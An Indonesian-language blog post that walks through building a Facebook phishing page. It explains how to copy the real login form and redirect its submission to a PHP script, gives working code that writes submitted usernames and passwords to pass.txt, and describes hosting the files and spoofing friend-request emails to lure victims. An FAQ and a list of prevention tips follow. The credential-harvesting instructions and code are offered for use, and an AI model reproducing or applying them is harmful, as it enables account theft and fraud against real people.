1. buka http://www.facebook.com/login.php,
lalu view source. copy dan paste ke notepad.
Cari "action=" (tanpa quote) dan kita akan memulai editingnya.
pada action="https://login.facebook.com/login.php" ubahlah menjadi action="next.php"
kemudian ubah juga methode dari "POST" menjadi "get"
simpan notepad ini menjadi index.php (jangan html)
2. buka notepad baru isikan kode berikut :
Code: Select all
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
--> Simpan sebagai next.php
3. Buka notepad lagi biarkan kosong, lalu simpan dng nama pass.txt.
Upload 3 file tersebut "index.php, next.php, pass.txt" kedalam hosting misalnya
110mb.com, spam.com atau 007sites.com.
OK, Kamu sudah punya phising page facebook sekarang.
4. Langkah-langkah spoofing.
copy content asli undangan pertemanan dari facebook.
edit hyperlink dari : "http:/www.facebook.com/n/?reqs.php"
ganti dengan halaman phising anda, hal ini tidak akan merubah tampilan di content
asli facebook tapi tetap mengarah ke halaman phising kamu.phising siap dikirim ke korban kamu.
--------------------------------------------------------
Semoga bisa berguna.
Source: http://jasakom.com/forum/viewforum.php?f=2
--------------------------------------------------------
===============
*F.A.Q PHISING:
===============
I.
Phising , adalah tindakan memperoleh informasi pribadi seperti User ID, PIN,
nomor rekening bank, nomor kartu kredit Anda secara tidak sah. Informasi ini
kemudian akan dimanfaatkan oleh pihak penipu untuk mengakses rekening, melakukan
penipuan kartu kredit atau memandu nasabah untuk melakukan transfer ke rekening
tertentu dengan iming-iming hadiah
II.
Bagaimana phishing dilakukan?
Teknik umum yang sering digunakan oleh penipu adalah sebagai berikut:
* Penggunaan alamat e-mail palsu dan grafik untuk menyesatkan user
sehingga user terpancing menerima keabsahan e-mail atau web sites.
Agar tampak meyakinkan, pelaku juga seringkali memanfaatkan logo atau
merk dagang milik lembaga resmi, seperti; facebook, yahoo, bank atau penerbit lainnya.
Pemalsuan ini dilakukan untuk memancing korban menyerahkan data pribadi,
seperti; password, PIN dan nomor kartu kredit
* Membuat situs palsu yang sama persis dengan situs resmi atau pelaku phishing
mengirimkan e-mail yang berisikan link ke situs palsu tersebut.
* Membuat hyperlink ke web-site palsu atau menyediakan form isian yang ditempelkan
pada e-mail yang dikirim.
III.
Mencegah phishing
Jangan mudah terpancing untuk mengikuti arahan/petunjuk apapun sehubungan informasi
data, rekening atau informasi penting lainnya, yang dianjurkan pada e-mail yang dilink
ke situs tertentu. Jika Anda menerima e-mail sejenis ini dan mengatasnamakan Lembaga
tertentu yang mencurigakan atau ASPAL, berhati-hatilah.
===================================
*10 Tips Mencegah Serangan Phising*
===================================
1. Untuk situs sosial seperti Facebook, buat bookmark untuk halaman login atau mengetik URL www.facebook.com secara langsung di browser address bar.
2. Jangan mengklik link pada pesan email.
3. Hanya mengetik data rahasia pada website yang aman.
4. Mengecek akun bank Anda secara regular dan melaporkan apapun yang mencurigakan kepada bank Anda.
5. Kenali tanda giveaway yang ada dalam email phising:
- Jika hal itu tidak ditujukan secara personal kepada anda.
- Jika anda bukan satu-satunya penerima email.
- Jika terdapat kesalahan ejaan, tata bahasa atau sintaks yang buruk atau kekakuan lainnya dalam penggunaan bahasa. Biasanya ini dilakukan penyebar phising untuk mencegah filtering.
6. Menginstall software untuk kemanan internet dan tetap mengupdate antivirus.
7. Menginstall patch keamanan.
8. Waspada terhadap email dan pesan instan yang tidak diminta.
9. Berhati-hati ketika login yang meminta hak Administrator. Cermati alamat URL-nya yang ada di address bar.
10. Back up data anda.
Free Download Blogger/Blogspot Templates
13 tahun yang lalu
0 komentar:
Posting Komentar